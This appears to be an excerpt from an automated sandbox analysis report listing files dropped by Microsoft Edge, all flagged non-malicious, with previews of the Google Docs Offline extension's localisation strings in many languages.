                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1031
                                                                                                                                                                                                                                                                          Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1613
                                                                                                                                                                                                                                                                          Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):851
                                                                                                                                                                                                                                                                          Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):851
                                                                                                                                                                                                                                                                          Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):848
                                                                                                                                                                                                                                                                          Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1425
                                                                                                                                                                                                                                                                          Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):961
                                                                                                                                                                                                                                                                          Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):959
                                                                                                                                                                                                                                                                          Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):968
                                                                                                                                                                                                                                                                          Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):838
                                                                                                                                                                                                                                                                          Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1305
                                                                                                                                                                                                                                                                          Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):911
                                                                                                                                                                                                                                                                          Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):939
                                                                                                                                                                                                                                                                          Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):977
                                                                                                                                                                                                                                                                          Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):972
                                                                                                                                                                                                                                                                          Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):990
                                                                                                                                                                                                                                                                          Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1658
                                                                                                                                                                                                                                                                          Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1672
                                                                                                                                                                                                                                                                          Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):935
                                                                                                                                                                                                                                                                          Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1065
                                                                                                                                                                                                                                                                          Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2771
                                                                                                                                                                                                                                                                          Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):858
                                                                                                                                                                                                                                                                          Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):954
                                                                                                                                                                                                                                                                          Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):899
                                                                                                                                                                                                                                                                          Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2230
                                                                                                                                                                                                                                                                          Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1160
                                                                                                                                                                                                                                                                          Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):3264
                                                                                                                                                                                                                                                                          Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):3235
                                                                                                                                                                                                                                                                          Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):3122
                                                                                                                                                                                                                                                                          Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1895
                                                                                                                                                                                                                                                                          Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1042
